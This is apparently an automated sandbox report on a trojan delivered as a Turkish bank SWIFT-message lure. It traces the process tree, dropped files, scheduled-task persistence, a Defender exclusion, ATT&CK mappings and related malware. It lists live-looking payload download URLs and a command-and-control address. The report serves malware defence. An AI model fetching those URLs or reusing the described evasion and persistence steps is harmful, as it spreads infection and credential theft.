Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Users\user\AppData\Roaming\regasms.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Queries volume information: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe :: Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe :: Queries volume information: C:\Users\user\AppData\Roaming\NotepadUpdate.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\rundll32.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regasms.exe PID: 7464, type: MEMORYSTR
Source: regasms.exe, 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: MSASCui.exe
Source: regasms.exe, 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: procexp.exe
Source: regasms.exe, 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Roaming\regasms.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
ATT&CK Matrix (a leading number is the count of matching signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 131 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 Input Capture | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 212 Process Injection | 221 Obfuscated Files or Information | LSASS Memory | 24 System Information Discovery | Remote Desktop Protocol | 1 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 3 Scheduled Task/Job | 3 Scheduled Task/Job | 3 Scheduled Task/Job | 12 Software Packing | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 341 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 151 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 151 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 212 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1572391 | Sample: Ziraat Bankasi Swift Mesaji... | Start date: 10/12/2024 | Architecture: WINDOWS | Score: 100

Network contacts from the start node: edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com; 2 other IPs or domains
Signatures on the start node: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures

Process tree (child processes indented under their parent; dropped files, network contacts and signatures listed under the process they belong to):

loaddll64.exe
    cmd.exe
        rundll32.exe
            network: 52575815-38-20200406120634.webstarterz.com 163.44.198.57, 443, 49700, 49701 (GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG, Singapore)
            dropped: C:\Users\user\AppData\Roaming\regasms.exe, PE32
            regasms.exe
                dropped: C:\Users\user\AppData\...\AtkzppDHiyvcIR.exe, PE32; C:\Users\user\AppData\Local\...\tmp18B1.tmp, XML
                signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file; 4 other signatures
                regasms.exe
                    dropped: C:\Users\user\AppData\...\NotepadUpdate.exe, PE32
                    cmd.exe
                        conhost.exe
                        timeout.exe
                        NotepadUpdate.exe
                    cmd.exe
                        conhost.exe
                        schtasks.exe
                powershell.exe
                    signature: Loading BitLocker PowerShell Module
                    conhost.exe
                schtasks.exe
                    conhost.exe
    rundll32.exe
        signature: System process connects to network (likely due to code injection or exploit)
        regasms.exe
            signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
            powershell.exe
                signature: Loading BitLocker PowerShell Module
                conhost.exe
                WmiPrvSE.exe
            regasms.exe
                network: 185.208.158.187, 4449, 49756 (SIMPLECARRER2IT, Switzerland)
                cmd.exe
                    conhost.exe
                    schtasks.exe
            schtasks.exe
                conhost.exe
    conhost.exe
    rundll32.exe
AtkzppDHiyvcIR.exe
    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
    schtasks.exe
        conhost.exe
    AtkzppDHiyvcIR.exe
    AtkzppDHiyvcIR.exe
NotepadUpdate.exe

Source | Detection | Scanner | Label | Link
Ziraat Bankasi Swift Mesaji.dqy.dll | 37% | ReversingLabs | Win64.Trojan.Generic |
Ziraat Bankasi Swift Mesaji.dqy.dll | 100% | Avira | HEUR/AGEN.1323336 |
Ziraat Bankasi Swift Mesaji.dqy.dll | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\regasms.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\NotepadUpdate.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | 26% | ReversingLabs | |
C:\Users\user\AppData\Roaming\NotepadUpdate.exe | 26% | ReversingLabs | |
C:\Users\user\AppData\Roaming\regasms.exe | 26% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
https://52575815-38-20200406120634.webstarterz.com/EpWHRWboolCJUXe.exe | 100% | Avira URL Cloud | malware |
https://52575815-38-20200406120634.webstarterz.com:443/EpWHRWboolCJUXe.exe | 100% | Avira URL Cloud | malware |
https://52575815-38-20200406120634.webstarterz.com/ | 100% | Avira URL Cloud | malware |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
52575815-38-20200406120634.webstarterz.com | 163.44.198.57 | true | false | | high
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.98 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://52575815-38-20200406120634.webstarterz.com/EpWHRWboolCJUXe.exe | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://52575815-38-20200406120634.webstarterz.com/ | rundll32.exe, 00000005.00000002.1365084163.0000022E795E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://52575815-38-20200406120634.webstarterz.com:443/EpWHRWboolCJUXe.exe | rundll32.exe, 00000005.00000002.1365084163.0000022E795E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CE2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | regasms.exe, 0000000D.00000002.1403401343.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003121000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1535778393.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002851000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.0000000003133000.00000004.00000800.00020000.00000000.sdmp, NotepadUpdate.exe, 00000028.00000002.1574426924.0000000003141000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | rundll32.exe, 00000005.00000002.1365084163.0000022E79661000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1364433339.000000344ECEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392342926.000000FEF1D3B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
163.44.198.57 | 52575815-38-20200406120634.webstarterz.com | Singapore | | 135161 | GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | false
185.208.158.187 | unknown | Switzerland | | 34888 | SIMPLECARRER2IT | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572391
Start date and time: 2024-12-10 14:20:40 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 48
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ziraat Bankasi Swift Mesaji.dqy.dll (renamed file extension from exe to dll)
Original Sample Name: Ziraat Bankasi Swift Mesaji.dqy.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winDLL@58/22@2/2
EGA Information:
• Successful, ratio: 87.5%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 366
• Number of non-executed functions: 10
Cookbook Comments:
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 217.20.58.98, 23.193.114.26, 23.193.114.18, 13.107.246.63, 23.36.245.152, 20.12.23.50
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target rundll32.exe, PID 5776, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Ziraat Bankasi Swift Mesaji.dqy.dll
Time | Type | Description
08:21:38 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
08:21:44 | API Interceptor | 7047743x Sleep call for process: regasms.exe modified
08:21:48 | API Interceptor | 39x Sleep call for process: powershell.exe modified
08:21:53 | API Interceptor | 25x Sleep call for process: AtkzppDHiyvcIR.exe modified
09:29:16 | API Interceptor | 2x Sleep call for process: NotepadUpdate.exe modified
14:21:50 | Task Scheduler | Run new task: AtkzppDHiyvcIR path: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
15:29:16 | Task Scheduler | Run new task: NotepadUpdate path: "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
163.44.198.57 | Payment Confirmation..docm | malicious | Snake Keylogger | 52575815-38-20200406120634.webstarterz.com/pSRrNpLv0bS37RA.exe
163.44.198.57 | PO#2207008 .docm | malicious | Snake Keylogger | 52575815-38-20200406120634.webstarterz.com/nawBVBlSWH7iu7T.scr
185.208.158.187 | file.exe | malicious | AsyncRAT, VenomRAT |
185.208.158.187 | file.exe | malicious | AsyncRAT, VenomRAT |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
52575815-38-20200406120634.webstarterz.com | Price Quotation-01.dqy.dll | malicious | Snake Keylogger | 163.44.198.57
52575815-38-20200406120634.webstarterz.com | Payment Confirmation..docm | malicious | Snake Keylogger | 163.44.198.57
52575815-38-20200406120634.webstarterz.com | PO#2207008 .docm | malicious | Snake Keylogger | 163.44.198.57
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | file.exe | malicious | Credential Flusher | 217.20.58.98
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 8jH2JH42wS.exe | malicious | Unknown | 217.20.58.101
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Marsha Rowland Signature Required.pdf | malicious | Unknown | 217.20.58.100
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbs | malicious | Unknown | 217.20.58.100
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | https://reader.egress.com/remote.aspx/s/storage.phe.gov.uk/email/e0599f812894d1904a8fe3cf7f605bcb | malicious | Unknown | 217.20.58.101
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Msig Insurance Europe.pdf | malicious | Unknown | 217.20.58.101
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | IobqEI79aH.exe | malicious | Unknown | 217.20.58.99
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | hra33.dll | malicious | Nitol | 217.20.58.98
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | file.exe | malicious | Quasar | 217.20.58.100
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | spoolsv.exe | malicious | RedLine, StormKitty, XWorm | 217.20.58.100
bg.microsoft.map.fastly.net | Price Quotation-01.dqy.dll | malicious | Snake Keylogger | 199.232.214.172
bg.microsoft.map.fastly.net | New Order Enquiry.js | malicious | AgentTesla | 199.232.214.172
bg.microsoft.map.fastly.net | E-dekont.exe | malicious | MassLogger RAT | 199.232.210.172
bg.microsoft.map.fastly.net | Rep_ort2024Dec9.pdf | malicious | Captcha Phish | 199.232.210.172
bg.microsoft.map.fastly.net | PO. A-72 9234567.exe | malicious | FormBook, GuLoader | 199.232.214.172
bg.microsoft.map.fastly.net | c2.hta | malicious | XWorm | 199.232.210.172
bg.microsoft.map.fastly.net | SC3sPWT51E.exe | malicious | LummaC Stealer | 199.232.214.172
bg.microsoft.map.fastly.net | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 199.232.214.172
bg.microsoft.map.fastly.net | OrderSheet.xla.xlsx | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | malicious | Stealc | 199.232.210.172

Match | Associated Sample Name / URL | Detection | Threat Name | Context
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | Price Quotation-01.dqy.dll | malicious | Snake Keylogger | 163.44.198.57
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | Payment Confirmation..docm | malicious | Snake Keylogger | 163.44.198.57
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | PO#2207008 .docm | malicious | Snake Keylogger | 163.44.198.57
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | GRAINS.vbs | malicious | AgentTesla | 163.44.198.71
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | Halkbank_Ekstre.exe | malicious | AgentTesla | 163.44.198.71
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | https://t.ly/UEfhC | malicious | HTMLPhisher, Mamba2FA | 163.44.198.45
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | PRODUCT-PICTURE.bat | malicious | AgentTesla | 163.44.198.71
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | ilZhNx3JAc.bat | malicious | AgentTesla | 163.44.198.71
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | 87M9Y3P4Z7.bat | malicious | AgentTesla | 163.44.198.71
